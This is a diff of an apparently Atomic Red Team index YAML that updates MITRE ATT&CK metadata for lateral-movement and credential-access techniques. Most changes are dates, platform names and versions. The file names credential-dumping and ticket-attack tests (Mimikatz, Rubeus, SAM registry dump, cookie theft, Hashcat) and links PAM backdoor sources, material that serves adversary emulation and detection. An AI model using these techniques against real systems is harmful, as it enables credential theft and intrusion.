       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -70879,7 +71557,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -70895,34 +71572,35 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests:
     - name: Mimikatz Kerberos Ticket Attack
@@ -71028,7 +71706,7 @@ lateral-movement:
           \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubeus.exe\" purge      "
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -71053,12 +71731,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -71072,13 +71749,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -71095,7 +71771,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -71143,7 +71819,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -71176,7 +71852,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests:
     - name: Radmin Viewer Utility
@@ -71320,7 +71995,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -71354,12 +72029,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -71387,10 +72060,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -71420,7 +72092,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -71482,7 +72153,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests:
     - name: Exfiltration Over SMB over QUIC (New-SmbMapping)
@@ -71537,7 +72207,7 @@ lateral-movement:
         elevation_required: true
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -71561,11 +72231,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -71590,9 +72259,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -71652,7 +72320,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests:
     - name: RDP hijacking
@@ -71733,7 +72400,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests:
     - name: Mimikatz Pass the Hash
@@ -71921,7 +72587,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests:
     - name: RDP to DomainController
@@ -72051,7 +72716,7 @@ lateral-movement:
         name: command_prompt
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -72108,6 +72773,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -72118,13 +72784,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -72183,7 +72848,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -72277,49 +72941,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -72334,20 +72959,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -72427,7 +73089,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests:
     - name: Input Capture
@@ -72468,7 +73129,7 @@ credential-access:
         elevation_required: true
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -72497,6 +73158,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -72508,18 +73170,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -72546,9 +73208,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests:
     - name: Brute Force Credentials of single Active Directory domain users via SMB
@@ -72711,7 +73370,7 @@ credential-access:
         elevation_required: false
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -72835,7 +73494,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests:
     - name: Gsecdump
@@ -73013,7 +73671,7 @@ credential-access:
         elevation_required: false
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -73028,10 +73686,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -73039,14 +73698,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -73089,9 +73748,6 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests:
     - name: Steal Firefox Cookies (Windows)
@@ -73181,7 +73837,7 @@ credential-access:
         elevation_required: false
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -73236,9 +73892,8 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests:
     - name: Registry dump of SAM, creds, and secrets
@@ -73444,7 +74099,7 @@ credential-access:
         elevation_required: true
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -73495,14 +74150,13 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests: []
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -73536,8 +74190,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -73554,11 +74208,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -73576,7 +74229,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -73593,10 +74246,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -73620,7 +74273,6 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests:
     - name: Password Cracking with Hashcat
@@ -73670,41 +74322,8 @@ credential-access:
         elevation_required: true
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -73725,65 +74344,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
